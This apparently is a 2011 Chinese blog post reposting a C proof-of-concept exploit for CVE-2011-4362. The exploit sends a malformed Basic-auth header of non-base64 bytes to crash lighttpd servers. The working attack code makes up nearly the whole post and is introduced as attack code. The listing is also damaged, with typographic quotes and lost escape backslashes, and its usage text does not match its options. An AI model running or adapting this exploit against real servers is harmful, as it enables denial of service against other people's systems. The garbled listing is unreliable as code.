攻击代码如下:

#include <stdio.h>

#include <stdlib.h>

#include <string.h>

#include <netdb.h>

#include <netinet/in.h>

#include <sys/types.h>

#include <sys/socket.h>

#include <getopt.h>

/* Default destination port; main() uses it as the initial value of `i`
 * before any -p option is parsed. */
#define PORT 80

/* Shorthand for the generic socket address type, used in the connect() cast. */
#define SA struct sockaddr

/*
 * Request template used when the destination port is 80.
 * Format arguments, in order: %s = remote directory, %s = host name.
 * The template deliberately ends with an unterminated "Authorization: Basic "
 * field; main() appends the credential bytes and the end-of-headers marker.
 *
 * NOTE(review): as rendered on this page the string literals use typographic
 * quotes and the line-ending escapes have lost their backslashes ("rn"), so
 * the listing does not compile as shown.
 *
 * Defender's view: every header value here is a fixed string (User-Agent,
 * Accept-Language "pl,en-us", the non-standard Proxy-Connection field), so
 * the unmodified tool produces a stable request fingerprint that can be
 * matched in web-server or proxy logs.
 */
char header[] =

“GET /%s/ HTTP/1.1rn”

“Host: %srn”

“User-Agent: Mozilla/5.0 (X11; Linux i686; rv:8.0.1) Gecko/20100101 Firefox/8.0.1rn”

“Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8rn”

“Accept-Language: pl,en-us;q=0.7,en;q=0.3rn”

“Accept-Encoding: gzip, deflatern”

“Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7rn”

“Proxy-Connection: keep-alivern”

“Authorization: Basic “;

 

/*
 * Same request template as `header`, but the Host field carries an explicit
 * port. Format arguments, in order: %s = remote directory, %s = host name,
 * %d = port. main() selects this variant when the port is not 80, and also
 * uses its length when sizing the request buffer.
 *
 * NOTE(review): the same extraction damage applies here (typographic quotes,
 * "rn" where an escaped line ending was presumably intended).
 */
char header_port[] =

“GET /%s/ HTTP/1.1rn”

“Host: %s:%drn”

“User-Agent: Mozilla/5.0 (X11; Linux i686; rv:8.0.1) Gecko/20100101 Firefox/8.0.1rn”

“Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8rn”

“Accept-Language: pl,en-us;q=0.7,en;q=0.3rn”

“Accept-Encoding: gzip, deflatern”

“Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7rn”

“Proxy-Connection: keep-alivern”

“Authorization: Basic “;

/*
 * Entry point of the proof of concept for CVE-2011-4362 (the banner below
 * names the CVE and the original author).
 *
 * What the visible code does:
 *   1. parses -h <host>, -p <port>, -d <remote dir> with getopt();
 *   2. resolves the host with gethostbyname();
 *   3. formats one HTTP GET request from `header` / `header_port`;
 *   4. appends 130 bytes with values starting at 127 directly after
 *      "Authorization: Basic ", followed by four terminator characters;
 *   5. opens a TCP connection, writes the request once and closes the socket.
 * It never reads the server's response.
 *
 * Defender's view: per the public CVE entry, CVE-2011-4362 is a signedness
 * error in lighttpd's base64 decoding of HTTP authentication data that leads
 * to an out-of-bounds read and a possible crash; confirm the affected and
 * fixed releases against the vendor advisory and upgrade accordingly. On the
 * wire, the distinguishing feature of this request is a Basic credential that
 * contains bytes outside the base64 alphabet (0x7f and above), which a WAF or
 * IDS rule can reject, and which shows up next to the fixed header set in the
 * templates above.
 *
 * NOTE(review): code-quality problems visible in this listing:
 *   - usage() is called before any declaration of it is in scope;
 *   - <unistd.h> is not included although write() and close() are used;
 *   - strdup() results and the write() return value are not checked;
 *   - the function is declared int but has no return statement.
 */
int main(int argc, char *argv[]) {

   int i=PORT,opt=0,sockfd;

   char *remote_dir = NULL;

   char *r_hostname = NULL;

   struct sockaddr_in servaddr;

   struct hostent *h = NULL;

   char *buf;

   unsigned int len = 0x0;

   // No arguments at all: print the help text (usage() exits the process).
   if (!argv[1])

      usage(argv[0]);

   printf(“nt…::: -=[ Proof of Concept for CVE-2011-4362 (by Adam ‘pi3’ Zabrocki) ]=- :::…n”);

   printf(“ntt[+] Preparing arguments… “);

   // Accepted options: -h host, -d directory, -p port; '?' and unknown
   // options fall through to usage().
   while((opt = getopt(argc,argv,”h:d:p:?”)) != -1) {

      switch(opt) {

       case ‘h’:

         r_hostname = strdup(optarg);

         // Name resolution happens immediately; failure aborts the program.
         if ( (h = gethostbyname(r_hostname))==NULL) {

             printf(“Gethostbyname() field!n”);

             exit(-1);

         }

         break;

       case ‘p’:

             // NOTE(review): atoi() gives no error indication, so a
             // non-numeric or out-of-range port is not detected here.
             i=atoi(optarg);

         break;

       case ‘d’:

             remote_dir = strdup(optarg);

         break;

       case ‘?’:

             usage(argv[0]);

         break;

       default:

             usage(argv[0]);

         break;

      }

   }

   // Both the directory and a successfully resolved host are mandatory.
   if (!remote_dir || !h) {

      usage(argv[0]);

      exit(-1);

   }

   // NOTE(review): servaddr is not zeroed before its fields are assigned.
   servaddr.sin_family      = AF_INET;

   servaddr.sin_port        = htons(i);

   servaddr.sin_addr        = *(struct in_addr*)h->h_addr;

   // Buffer size: the longer template plus both user strings plus 512 bytes
   // of slack, which has to cover the port digits, the 130 appended bytes
   // and the terminator characters written below.
   len = strlen(header_port)+strlen(remote_dir)+strlen(r_hostname)+512;

   if ( (buf = (char *)malloc(len)) == NULL) {

      printf(“malloc() :(n”);

      exit(-1);

   }

   // Zero-fill so that every strlen(buf) below finds the current end of the
   // request; the append-by-strlen pattern depends on this.
   memset(buf,0x0,len);

   // Pick the template: explicit port in the Host field unless it is 80.
   if (i != 80)

      snprintf(buf,len,header_port,remote_dir,r_hostname,i);

   else

      snprintf(buf,len,header,remote_dir,r_hostname);

   // The port variable is reused as the loop counter from here on.
   // Each pass stores the value 127+i at the current end of the string, so
   // the Basic credential consists of non-base64 bytes rather than a valid
   // encoded user:password pair.
   for (i=0;i<130;i++)

      buf[strlen(buf)] = 127+i;

   // Four terminator characters are appended one at a time; presumably these
   // were escaped CR/LF characters before the page lost its backslashes,
   // i.e. the blank line that ends the header section (confirm against the
   // original source).
   buf[strlen(buf)] = ‘r’;

   buf[strlen(buf)] = ‘n’;

   buf[strlen(buf)] = ‘r’;

   buf[strlen(buf)] = ‘n’;

   printf(“OKntt[+] Creating socket… “);

   if ( (sockfd=socket(AF_INET,SOCK_STREAM,0)) < 0 ) {

      printf(“Socket() error!n”);

      exit(-1);

   }

   printf(“OKntt[+] Connecting to [%s]… “,r_hostname);

   if ( (connect(sockfd,(SA*)&servaddr,sizeof(servaddr)) ) < 0 ) {

      printf(“Connect() error!n”);

      exit(-1);

   }

   printf(“OKntt[+] Sending dirty packet… “);

//   write(1,buf,strlen(buf));

   // Single write of the whole request; the result is ignored and no reply
   // is read, so the tool itself cannot tell whether the server was affected.
   write(sockfd,buf,strlen(buf));

   printf(“OKnntt[+] Check the website!nn”);

   close(sockfd);

}

/*
 * Prints the banner and the option summary, then terminates the process
 * with exit(0); it never returns to the caller despite the int return type.
 *
 * arg: program name to show in the "Usage:" line (callers pass argv[0]).
 *
 * NOTE(review): the help text advertises "-v <victim>", but the getopt()
 * string in main() accepts -h for the host, so the printed usage does not
 * match the options actually parsed. The blog URL and e-mail lines are not
 * part of the banner credited to the original author and were presumably
 * added by whoever reposted the listing.
 */
int usage(char *arg) {

      printf(“nt…::: -=[ Proof of Concept for CVE-2011-4362 (by Adam ‘pi3’ Zabrocki) ]=- :::…n”);

 printf(“nt*** [ blog http://www.kukafei520.net ]”);

 printf(“nt*** [ E-mail voilet119@163.com ]”);

      printf(“ntUsage: %s <options>nnttOptions:n”,arg);

      printf(“ttt -v <victim>nttt -p <port>nttt -d <remote_dir_for_auth>nn”);

      exit(0);

}




十二月 27th, 2011

Posted In: 网络技术
